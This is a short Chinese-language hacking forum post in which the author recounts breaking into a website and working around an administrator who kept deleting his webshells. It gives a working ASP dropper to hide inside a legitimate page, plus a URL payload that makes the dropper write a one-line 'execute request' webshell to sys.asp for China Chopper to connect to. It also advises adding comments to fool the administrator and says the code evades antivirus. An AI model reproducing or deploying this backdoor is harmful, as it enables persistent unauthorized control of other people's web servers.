主题:另类一句话插入技巧
Author:Roker
内容:今天搞渗透的时候,没想到管理员在,上传的shell全被他删了
一句话木马也不放过
无奈写下了下面的脚本
<% id =request("id") if id <> "" then set fso=Server.CreateObject("Scripting.FileSystemObject") with fso.opentextfile(server.mappath("sys.asp"),8,true) .Writeline id .close End with End if %> /*不会被杀,很正常的代码。不需要加密。
再加一些注释迷惑管理员,
插入到正常asp文件
这样只要我一访问 aspname.asp?id=<SCRIPT language=VBScript runat="server">execute request("123")</SCRIPT>
就会在 根目录下 生成 sys.asp一句话
菜刀连之,成功